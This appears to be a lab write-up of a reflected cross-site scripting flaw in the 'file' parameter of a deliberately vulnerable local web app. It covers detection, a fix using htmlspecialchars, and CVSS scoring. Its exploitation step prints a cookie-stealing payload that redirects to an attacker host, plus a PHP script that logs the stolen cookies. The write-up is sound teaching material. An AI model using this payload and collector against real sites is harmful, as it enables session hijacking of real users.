## Version 1.4.1
## language: en

Feature:
  TOE:
    diwa
  Location:
    http://127.0.0.1:8080/?page=documentation - path (field)
  CWE:
    CWE-79: Improper Neutralization of Input During Web Page
    Generation ('Cross-site Scripting')
  Rule:
    REQ.173: Discard unsafe inputs
  Goal:
    Execute javascript's code in the page
  Recommendation:
    Sanitize inputs

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Arch Linux      | 2020.07.01  |
    | Brave           | 1.10.97     |
    | Docker          | 19.03.12-ce |
  TOE information:
    Given I am accessing the site http://127.0.0.1:8080/
    And the site runs on a docker container

  Scenario: Normal use case
    Given I access the page
    And I see several md files at the left of the page
    When I click on one of those files
    Then I can see it's content gets displayed

  Scenario: Static detection
    When I look at the code at documentation.php
    Then I can see that the vulnerability is being caused by line 53
    """
    52 if(isset($_GET['file']) && !empty($_GET['file'])) {
    53  echo '<h1>' . $_GET['file'] . '</h1><hr/>';
    """
    And since no validation is done to the parameter "file"
    Then I can conclude the page is vulnerable to XSS

  Scenario: Dynamic detection
    Given I know the vulnerable field is "file"
    When I go to
    """
    http://127.0.0.1:8080/?page=documentation&path=./&file=<script>\
    alert("XSS");</script>
    """
    Then I see the javascript's code got executed [evidence](xss.png)
    And I can conclude that the site is vulnerable to XSS

  Scenario: Exploitation
    Given the site is vulnerable to XSS
    And one possible attack scenario is to try to steal admin's cookie
    Then if I manage to get the admin to open the link
    """
     http://127.0.0.1:8080/?page=documentation&path=./&file=\
     document.location='http://mypage/index.php?c='.concat(document.cookie);
    """
    And mypage has the following code
    """
    <?php
      $cookie = $_GET["c"];
      $file = fopen("cookies.txt", "a");
      fwrite($file, $cookie . "\r\n");
    ?>
    """
    When admin opens the link it will be redirected to my malicious page
    And his cookie will be stolen [evidence](cookie.png)
    Then I can conclude that I can compromise users

  Scenario: Remediation
    Given I have patched the code by calling the function htmlspecialchars
    """
    53  echo '<h1>' . htmlspecialchars($_GET['file']) . '</h1><hr/>';
    """
    When I go back to
    """
    http://127.0.0.1:8080/?page=documentation&path=./&file=<script>\
    alert("XSS");</script>
    """
    Then I can see it does not work anymore [evidence](noxss.png)
    And I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.5 (Medium) - AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.2 (Medium) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    4.1 (Medium) - MAV:N/MAC:L/MPR:N/MUI:R/MC:L/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date {2020-07-13}
